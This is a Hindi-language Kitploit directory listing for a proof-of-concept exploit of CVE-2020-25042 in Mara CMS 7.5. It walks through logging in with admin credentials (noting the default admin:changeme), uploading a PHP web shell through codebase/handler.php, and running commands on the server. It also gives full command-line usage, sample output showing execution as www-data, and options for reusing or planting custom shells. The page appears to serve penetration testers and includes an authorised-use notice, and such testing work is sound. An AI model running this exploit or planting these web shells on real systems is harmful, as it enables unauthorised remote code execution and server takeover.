Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-25042-PoC — PoC for CVE-2020-25042: स्वचालित Mara CMS 7.5 प्रमाणित PHP अपलोड से RCE तक, लॉगिन हैश हैंडलिंग, शेल पुन: उपयोग, कस्टम पेलोड समर्थन, और स्वच्छ CLI आउटपुट के साथ। | Kitploit
उपकरण/GitHubGitHub/groppoxx/cve-2020-25042-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubgroppoxx/cve-2020-25042-poc

CVE-2020-25042-PoC

PoC for CVE-2020-25042: स्वचालित Mara CMS 7.5 प्रमाणित PHP अपलोड से RCE तक, लॉगिन हैश हैंडलिंग, शेल पुन: उपयोग, कस्टम पेलोड समर्थन, और स्वच्छ CLI आउटपुट के साथ।

रिपॉजिटरी देखें
543 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-25042-PoC

CVE-2020-25042 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, जो Mara CMS 7.5 में एक प्रमाणित (authenticated) मनमाना फ़ाइल अपलोड दोष है जो रिमोट कोड निष्पादन का कारण बन सकता है।

यह स्क्रिप्ट एक वैध Mara CMS एडमिन/मैनेजर खाते से लॉगिन करती है, codebase/handler.php के माध्यम से एक PHP पेलोड अपलोड करती है, और अपलोड की गई फ़ाइल के माध्यम से कमांड निष्पादित करती है।

यह संभव होने पर मौजूदा शेल का पुनः उपयोग भी करती है, ताकि आपको हर बार चलाने पर नई PHP फ़ाइल न बनानी पड़े।

यह क्या करती है

  1. जाँच करती है कि अपेक्षित शेल पहले से मौजूद है और पुनः उपयोग योग्य है या नहीं।
  2. यदि पुनः उपयोग योग्य है, तो सीधे कमांड निष्पादित करती है।
  3. यदि पुनः उपयोग योग्य नहीं है, तो CMS पेज लोड करती है और shash निकालती है।
  4. setsalt एक्शन के साथ लॉगिन सॉल्ट का अनुरोध करती है।
  5. Mara CMS लॉगिन हैश की गणना करती है।
  6. एक वैध उपयोगकर्ता के रूप में प्रमाणित करती है।
  7. codebase/dir.php?type=filenew पर अपलोड फ़्लो खोलती है।
  8. codebase/handler.php के माध्यम से एक PHP कमांड पेलोड अपलोड करती है।
  • अपलोड किए गए शेल के माध्यम से --cmd निष्पादित करती है।
  • आवश्यकताएँ

    root@kitploit:~
    Python 3.8+
    
    pip install -r requirements.txt
    

    आवश्यक Python पैकेज:

    root@kitploit:~
    requests
    urllib3
    

    त्वरित प्रारंभ

    कोण कोष्ठकों (< >) में लिपटे मान प्लेसहोल्डर हैं। उन्हें अपने स्वयं के मानों से बदलें और < या > वर्ण शामिल न करें।

    root@kitploit:~
    python3 cve_2020_25042.py \
      --url <MARA_CMS_URL> \
      --username <USERNAME> \
      --password '<PASSWORD>' \
      --cmd whoami
    

    प्लेसहोल्डर

    root@kitploit:~
    <MARA_CMS_URL>  # लक्षित Mara CMS आधार URL। उदाहरण: http://target/cms
    <USERNAME>      # वैध Mara CMS एडमिन/मैनेजर उपयोगकर्ता नाम।
    <PASSWORD>      # वैध Mara CMS एडमिन/मैनेजर पासवर्ड।
    

    पूर्ण उदाहरण

    root@kitploit:~
    python3 cve_2020_25042.py \
      --url http://10.129.96.20/cms \
      --username admin \
      --password changeme \
      --cmd whoami
    

    उदाहरण आउटपुट:

    root@kitploit:~
    [2026-05-17T23:32:31Z] [*] Checking existing shell: http://10.129.96.20/cms/img/mara-poc.php
    [2026-05-17T23:32:31Z] [*] Loading Mara CMS page and collecting session data
    [2026-05-17T23:32:31Z] [+] Found shash: 9552
    [2026-05-17T23:32:31Z] [*] Requesting login salt
    [2026-05-17T23:32:31Z] [+] Got salt: 4253
    [2026-05-17T23:32:31Z] [*] Logging in as admin
    [2026-05-17T23:32:31Z] [+] Login successful: OK:5
    [2026-05-17T23:32:31Z] [*] Opening upload form
    [2026-05-17T23:32:32Z] [*] Uploading PHP payload as mara-poc.php
    [2026-05-17T23:32:32Z] [+] Upload request completed
    [2026-05-17T23:32:32Z] [+] Shell URL: http://10.129.96.20/cms/img/mara-poc.php
    [2026-05-17T23:32:32Z] [*] Executing command: whoami
    
    [+] Command output
    MARA_CVE_2020_25042_OK
    www-data
    

    मौजूदा शेल का पुनः उपयोग

    डिफ़ॉल्ट रूप से, स्क्रिप्ट एक स्थिर शेल नाम का उपयोग करती है:

    root@kitploit:~
    mara-poc.php
    

    अगली बार चलाने पर, यह जाँच करती है:

    root@kitploit:~
    http://target/cms/img/mara-poc.php
    

    यदि शेल अपेक्षित मार्कर के साथ प्रतिक्रिया देता है, तो स्क्रिप्ट लॉगिन और अपलोड छोड़ देती है:

    root@kitploit:~
    python3 cve_2020_25042.py \
      --url http://10.129.96.20/cms \
      --cmd "ls -la"
    

    पिछले यादृच्छिक नाम से बनाए गए शेल को पुनः उपयोग करने के लिए:

    root@kitploit:~
    python3 cve_2020_25042.py \
      --url http://10.129.96.20/cms \
      --shell-name mara-poc-jxfizldy.php \
      --cmd whoami
    

    आप खुला हुआ शेल पथ सीधे भी पास कर सकते हैं:

    root@kitploit:~
    python3 cve_2020_25042.py \
      --url http://10.129.96.20/cms \
      --shell-url-path /cms/img/mara-poc-jxfizldy.php \
      --cmd "ls -la"
    

    केवल अपलोड

    कमांड निष्पादित किए बिना पेलोड अपलोड करें:

    root@kitploit:~
    python3 cve_2020_25042.py \
      --url http://10.129.96.20/cms \
      --username admin \
      --password changeme \
      --upload-only
    

    वैकल्पिक फ़्लैग

    root@kitploit:~
    --page <PAGE>
       लॉगिन बूटस्ट्रैप करने और shash निकालने के लिए उपयोग किया जाने वाला मौजूदा CMS पेज। डिफ़ॉल्ट: lorem.php
    
    --shell-name <NAME>
       अपलोड करने या पुनः उपयोग करने के लिए PHP फ़ाइल नाम। डिफ़ॉल्ट: mara-poc.php
    
    --shell-url-path <PATH_OR_URL>
       पुनः उपयोग के लिए स्पष्ट शेल पथ या URL।
       उदाहरण: /cms/img/mara-poc.php
    
    --payload-file <FILE>
       डिफ़ॉल्ट ?cmd= शेल के बजाय एक कस्टम PHP पेलोड अपलोड करें।
    
    --destdir <DIR>
       अपलोड फ़ॉर्म में भेजा गया कच्चा destdir मान। डिफ़ॉल्ट Mara CMS को img/ उपयोग करने देता है।
    
    --force-upload
       हमेशा लॉगिन और अपलोड करें, भले ही पुनः उपयोग योग्य शेल पहले से मौजूद हो।
    
    --upload-only
       पेलोड अपलोड करें लेकिन --cmd निष्पादित न करें।
    
    --only-final
       प्रगति लॉग छिपाएँ और केवल कमांड आउटपुट प्रिंट करें।
    
    --no-color
       ANSI रंग अक्षम करें।
    
    --debug
       अनुरोध URL और हैंडलर प्रतिक्रिया के संक्षिप्त अंश प्रिंट करें।
    

    नोट्स

    • एक्सप्लॉइट के लिए एक वैध प्रमाणित Mara CMS एडमिन या मैनेजर सत्र आवश्यक है।
    • बिना संशोधित टेस्ट इंस्टॉलेशन पर डिफ़ॉल्ट Mara CMS क्रेडेंशियल admin:changeme हो सकते हैं।
    • डिफ़ॉल्ट पेलोड कमांड आउटपुट से पहले MARA_CVE_2020_25042_OK प्रिंट करता है।
    • Mara CMS 7.5 में देखा गया डिफ़ॉल्ट अपलोड स्थान img/ है।
    • लक्ष्य पर बहुत सारी PHP फ़ाइलें छोड़ने से बचने के लिए जब भी संभव हो शेल पुनः उपयोग का उपयोग करें।
    • --force-upload का उपयोग केवल तभी करें जब आपको पेलोड को अधिलेखित (overwrite) या पुनः बनाने की आवश्यकता हो।

    कानूनी

    यह PoC अधिकृत सुरक्षा परीक्षण, प्रयोगशाला वातावरण और भेद्यता सत्यापन के लिए है। बिना स्पष्ट अनुमति के इसे सिस्टम के विरुद्ध उपयोग न करें।

    टूल डाउनलोड करें